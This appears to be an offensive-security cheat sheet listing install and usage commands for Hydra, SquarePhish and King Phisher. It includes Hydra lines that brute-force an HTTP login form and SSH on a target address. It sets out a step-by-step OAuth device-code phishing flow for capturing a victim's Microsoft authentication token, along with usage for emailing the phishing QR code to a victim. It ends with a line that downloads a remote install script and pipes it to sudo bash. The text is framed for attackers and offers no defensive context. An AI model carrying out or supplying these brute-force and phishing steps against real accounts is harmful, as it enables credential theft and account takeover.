Nice tool for logon brute force attacks. Can bf a number of services including SSH, FTP, TELNET, HTTP etc.
Install:
sudo apt install hydra
Usage:
hydra -L USER.TXT -P PASS.TXT 1.1.1.1 http-post-form "login.php:username-^USER^&password=^PASS^:Error"
hydra -L USER.TXT -P PASS.TXT 1.1.1.1 ssh
SquarePhish is an advanced phishing tool that uses a technique combining OAuth Device code authentication flow and QR codes (See PhishInSuits for more about OAuth Device Code flow for phishing attacks).
Attack Steps:
- Send malicious QR code to victim
- Victim scans QR code with mobile device
- Victim directed to attacker controlled server (Triggering OAuth Device Code authentication flow process)
- Victim emailed MFA code (Triggering OAuth Device Code flow 15 minute timer)
- Attacker polls for authentication
- Victim enters code into legit Microsoft website
- Attacker saves authentication token
Install:
git clone https://github.com/secureworks/squarephish; cd squarephish; pip install -r requirements.txt
Note: Before using either module, update the required information in the settings.config file noted with Required
.
Usage (Email Module):
usage: squish.py email [-h] [-c CONFIG] [--debug] [-e EMAIL]
optional arguments:
-h, --help show this help message and exit
-c CONFIG, --config CONFIG
squarephish config file [Default: settings.config]
--debug enable server debugging
-e EMAIL, --email EMAIL
victim email address to send initial QR code email to
Usage (Server Module):
usage: squish.py server [-h] [-c CONFIG] [--debug]
optional arguments:
-h, --help show this help message and exit
-c CONFIG, --config CONFIG
squarephish config file [Default: settings.config]
--debug enable server debugging
King Phisher is a tool that allows attackers to create and send phishing emails to victims to obtain sensitive information.
It includes features like customizable templates, campaign management, and email sending capabilities, making it a powerful and easy-to-use tool for carrying out phishing attacks. With King Phisher, atackers can target individuals or organizations with targeted and convincing phishing emails, increasing the chances of success in their attacks.
Install (Linux - Client & Server):
wget -q https://github.com/securestate/king-phisher/raw/master/tools/install.sh && \
sudo bash